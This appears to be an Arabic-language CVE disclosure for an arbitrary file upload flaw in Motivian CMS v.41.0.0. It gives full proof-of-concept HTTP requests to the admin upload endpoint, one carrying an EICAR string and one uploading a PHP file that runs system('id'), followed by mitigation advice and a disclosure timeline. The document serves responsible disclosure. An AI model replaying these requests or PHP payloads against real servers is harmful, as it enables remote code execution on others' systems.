
يكشف هذا المستودع عن ثغرة أمنية اكتُشفت في نظام إدارة المحتوى Motivian الإصدار v.41.0.0.
يكشف هذا المستودع عن ثغرة أمنية اكتُشفت في Motivian Content Management System v.41.0.0.
تم الإبلاغ عن هذه الثغرة إلى البائع وفقًا لممارسات الإفصاح المسؤول، وإلى MITRE، التي خصصت معرّف CVE مؤقتًا. ويتم نشر التفاصيل بعد انتهاء فترة الإفصاح البالغة 45 يومًا.
Content/Gallery/Imagesتسمح ثغرة رفع الملفات في Motivian Content Managment System v.41.0.0 لمهاجم عن بُعد برفع ملفات تعسفية ذات امتدادات مصممة (مثل .php و.png و.txt) تحتوي على تعليمات برمجية خبيثة، عبر مكوّن Content/Gallery/Images.
يمكن استغلال الثغرة عن طريق رفع ملفات بامتدادات مختلفة. ولأغراض التوضيح، تم استخدام حالتين لإثبات المفهوم: الأولى تتضمن ملف .php يحتوي على تعليمات برمجية خبيثة، والثانية تستخدم ملف .txt يحتوي على سلسلة اختبار EICAR. تم رفع كلا الملفين عبر مكوّن Content/Gallery/Images.
فيما يلي النص الكامل لطلبات واستجابات HTTP المستخدمة لتوضيح المشكلة:
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
لا تسمح للمستخدمين برفع ملفات تعسفية. نفّذ تحققًا صارمًا من الملفات (فحص نوع MIME والمحتوى)، وعشوائية في أسماء الملفات، وقيّد أدلة الرفع.
| التاريخ | الإجراء |
|---|---|
| 2025-02-06 | طلب معرّف CVE (CNA: MITRE) |
| 2025-04-02 | تعيين معرّف CVE |
| 2025-04-07 | تم الإبلاغ عن الثغرات إلى البائع |
| 2025-05-31 | إفصاح عام بعد انتهاء فترة الإفصاح البالغة 45 يومًا (54 يومًا إجمالًا) |
| 2025-06-04 | التسجيل الرسمي والإدراج في قاعدة بيانات MITRE وبوابة NIST/NVD |
تم الاكتشاف والإفصاح المسؤول بواسطة:
Francesco Marcuccio
مستشار أمن سيبراني، مختبِر اختراق
يُدرج إسناد الاكتشاف في MITRE على النحو التالي:
Francesco Marcuccio
مستشار أمن سيبراني، مختبِر اختراق
معرّف CVE هذا في حالة PUBLISHED رسميًا. سيتم تحديثه بدرجة CVSS من قبل NIST بعد التحليل.